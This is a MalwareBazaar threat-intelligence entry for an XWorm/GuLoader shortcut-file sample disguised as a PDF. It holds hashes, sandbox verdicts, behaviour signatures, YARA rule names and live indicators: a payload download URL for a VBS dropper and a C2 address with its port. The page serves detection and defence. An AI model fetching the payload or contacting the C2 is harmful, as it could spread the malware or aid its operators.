MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


XWorm


Vendor detections: 13


Intelligence 13 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f
SHA3-384 hash: 799de988dd14004a21032a2c57101d840c34a085aa1792696f10f6634579dff7626bfe946335dd3c9bc6dbc3213f7a35
SHA1 hash: 9a00d06939dbd3fcdb605ceb31d449c8d39d1739
MD5 hash: 004eb763047b02f7811776863b415d25
humanhash: harry-lake-seven-lima
File name:GENINSTRFORCONDUCTIONLINECONDUCTOF66THDEEAWANTRGIHQA1771589777[COLIHQ_CC-17719928838].pdf.lnk
Download: download sample
Signature XWorm
Create hunting rule
File size:2'830 bytes
First seen:2026-03-18 13:40:56 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/x-ms-shortcut
ssdeep 24:8zJRscSXIEQ7AZPx+/+YjNgLOySU4Ug+/2xaiTi/T4I0zdyDM1JdzS/Lrt+hwvaH:8jscdUZGjiL+Jde/MIsyDM1C9rn8drI
TLSH T13E51231823EF9724F3BB4E7A2DB6C2904632FC51ACA6E35E2598028C6435714ED71F23
Magika lnk
Reporter smica83
Tags:lnk xworm

Intelligence

File Origin
# of uploads :
1
# of downloads :
47
Origin country :
HU HU
Vendor Threat Intelligence
Malware configuration found for:
LNK
Details
LNK
a command line and any observed urls
Link:
https://research.acce.ciphertechsolutions.com/results/d97ad021-5459-4b21-bdb7-be42785f8007/
Detection(s):
Sanesecurity.Malware.27118.LnkHeur.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.26476.PshHeur.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.30774.LnkHeur.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
94.1%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69baab7c93b644ca466b4ef8
Tags:
virus sage blic
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f/results/dashboard
Payload URLs
URL
File name
https://dfsl.maharashtra.gov.in/storage/img/acc.vbs
LNK File
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
base64 cmd lolbin masquerade powershell
Link:
https://www.filescan.io/uploads/69baab792000fc76c3e985bd/reports/f314d737-ca0a-46c0-a348-f4a1bae420b8/overview
Verdict:
Malicious
Labled as:
Trojan.LNK.Generic
Link:
https://www.hybrid-analysis.com/sample/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f
Result
Gathering data
Verdict:
Malicious
File Type:
lnk
Detections:
Trojan.WinLNK.Agent.sb HEUR:Trojan.WinLNK.Agent.gen
Link:
https://opentip.kaspersky.com/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f/results?tab=lookup
Result
Threat name:
GuLoader, XWorm
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1885699
Signature
C2 URLs / IPs found in malware configuration
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a MSI (Microsoft Installer) remotely
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Curl Download And Execute Combination
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Unusual module load detection (module proxying)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
WScript reads language and country specific registry keys (likely country aware script)
Wscript starts Powershell (via cmd or directly)
Yara detected GuLoader
Yara detected Powershell decode and execute
Yara detected XWorm
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1885699 Sample: GENINSTRFORCONDUCTIONLINECO... Startdate: 18/03/2026 Architecture: WINDOWS Score: 100 77 dfsl.maharashtra.gov.in 2->77 79 sn1prdapp01agg02-canary.cloudapp.net 2->79 81 12 other IPs or domains 2->81 101 Suricata IDS alerts for network traffic 2->101 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 14 other signatures 2->107 10 powershell.exe 18 2->10         started        13 cmd.exe 3 2 2->13         started        15 powershell.exe 2->15         started        signatures3 process4 signatures5 119 Writes to foreign memory regions 10->119 121 Found suspicious powershell code related to unpacking or dynamic code loading 10->121 123 Installs a MSI (Microsoft Installer) remotely 10->123 129 2 other signatures 10->129 17 msiexec.exe 4 10 10->17         started        21 msiexec.exe 10->21         started        23 conhost.exe 10->23         started        125 Wscript starts Powershell (via cmd or directly) 13->125 25 wscript.exe 2 13->25         started        27 curl.exe 2 13->27         started        30 conhost.exe 1 13->30         started        127 Windows shortcut file (LNK) starts blacklisted processes 15->127 32 powershell.exe 15->32         started        34 conhost.exe 15->34         started        process6 dnsIp7 71 217.217.251.213, 49705, 7000 COMUNITELSPAINES Spain 17->71 83 Obfuscated command line found 17->83 85 Installs a MSI (Microsoft Installer) remotely 17->85 36 cmd.exe 1 17->36         started        39 Acrobat.exe 57 17->39         started        41 msiexec.exe 17->41         started        43 WerFault.exe 17->43         started        87 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->87 89 Unusual module load detection (module proxying) 21->89 91 Windows shortcut file (LNK) starts blacklisted processes 25->91 93 Wscript starts Powershell (via cmd or directly) 25->93 95 Windows Scripting host queries suspicious COM object (likely to drop second stage) 25->95 99 2 other signatures 25->99 45 cmd.exe 1 25->45         started        73 dfsl.maharashtra.gov.in 103.8.188.85, 443, 49695, 49697 MHSDC2011-AS4thFloorNewAdministrativeBuildingIN India 27->73 75 127.0.0.1 unknown unknown 27->75 67 C:\Users\Public\acc.vbs, ASCII 27->67 dropped 97 Writes to foreign memory regions 32->97 47 msiexec.exe 32->47         started        49 msiexec.exe 32->49         started        file8 signatures9 process10 signatures11 109 Obfuscated command line found 36->109 51 conhost.exe 36->51         started        53 reg.exe 1 1 36->53         started        55 AcroCEF.exe 98 39->55         started        111 Windows shortcut file (LNK) starts blacklisted processes 45->111 113 Wscript starts Powershell (via cmd or directly) 45->113 57 powershell.exe 14 16 45->57         started        60 conhost.exe 45->60         started        115 Installs a MSI (Microsoft Installer) remotely 47->115 62 msiexec.exe 47->62         started        process12 signatures13 64 AcroCEF.exe 55->64         started        117 Found suspicious powershell code related to unpacking or dynamic code loading 57->117 process14 dnsIp15 69 184.29.30.201, 443, 49711 FASTNET-AS-IDLinknet-FastnetASNID United States 64->69
Gathering data
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f/
Verdict:
Malicious
Threat:
Family.XWORM
Link:
https://tip.neiki.dev/file/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f
Threat name:
Shortcut.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2026-03-18 13:41:24 UTC
File Type:
Binary
AV detection:
7 of 36 (19.44%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wbouuqgivizo3fpjfoj6jouennm66nxou4rqsij23jiggmbdyz7q._file
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:xworm defense_evasion discovery persistence privilege_escalation rat spyware trojan
Link:
https://tria.ge/reports/260318-qy7hpaaw4s/
Behaviour
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
System Time Discovery
Drops file in Windows directory
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Checks computer location settings
Use of msiexec (install) with remote resource
Badlisted process makes network request
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction:
217.217.251.213:7000
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:Execution_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies execution artefacts in shortcut (LNK) files.
Rule name:LNK_sospechosos
Create hunting rule
Author:Germán Fernández
Description:Detecta archivos .lnk sospechosos
Rule name:Script_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies scripting artefacts in shortcut (LNK) files.
Rule name:SUSP_LNK_CMD
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to cmd.exe inside an lnk file, which is suspicious

File information

The table below shows additional information about this malware sample such as delivery method and external references.

XWorm

Shortcut (lnk) lnk b05d4a40c8aa32ed95e92b93e4ba846b59ef36eea72309213ada50633023c67f

(this sample)

XWorm

Visual Basic Script (vbs) vbs 38f22fadabc43752dca980f573ec4b0b66d585697e103f7b35ddba449babd941

  
Dropping
SHA256 38f22fadabc43752dca980f573ec4b0b66d585697e103f7b35ddba449babd941
  
Dropping
MD5 93a5fd13caca347b56f027bd7cf3b813

Comments